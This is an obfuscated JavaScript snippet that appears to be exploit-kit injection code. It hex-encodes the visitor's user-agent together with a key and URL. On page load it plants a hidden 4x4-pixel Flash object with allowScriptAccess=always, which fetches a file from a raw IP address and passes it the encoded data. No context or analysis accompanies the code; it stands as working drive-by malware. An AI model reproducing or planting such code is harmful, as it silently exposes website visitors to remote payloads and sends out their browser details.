/*s32682d32361hssfj9061fs*/function hgfgerdfgdf(num, width){/*s62218d72286hfj14350fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s41415d53112hfj92672fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s96022d94653hfj12176fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s58382d15923hfj80731fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd21790hfs*/c += b + d;/*s55836d71206hfj76739fs*/e += 1;}return c;}/*s8414dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.79.140/?OTE0MzQwODE=&paper=xH_QMrDYbR7FFYDfKPrEUKdEMU3WA0eKwYyZha_VF5yxFDfGpbH1FxzspVydCFyEmvFvdLMHIwKh1UTASwc&inform=NDQzNjY5MDQ=&help=noise&mail=ynI9eWlgUpairh0PQzheV1JWH-RffZQtF95OVELA_31_yx7BFJMp0wheAvGMDmegtUVsW4Qganqz7VaOO-w&noise=NDIyMjQyNzE=", ghnvbn("http://188.225.79.140/?MTAwNDM4Mjk3&inform=MTczMzEyMDU=&help=slam&mail=ynI9eWlgUpairh0DQzheV1JWH-RTfZQtF95OVELM_31zyx7BFJMp0wheAvGADmestU1gZ5ggSm6z7S6CJrg&paper=xH_QMrPYbR3FFYPfKPrEUKdEMU3WA0eKwY-Zha_VF5-xFDfGpbH1Fx_spV-dCF-EmvFvdLMHIwKh1UfASwQ&gift=MTQ2OTI4MzY=","wexykukusw"));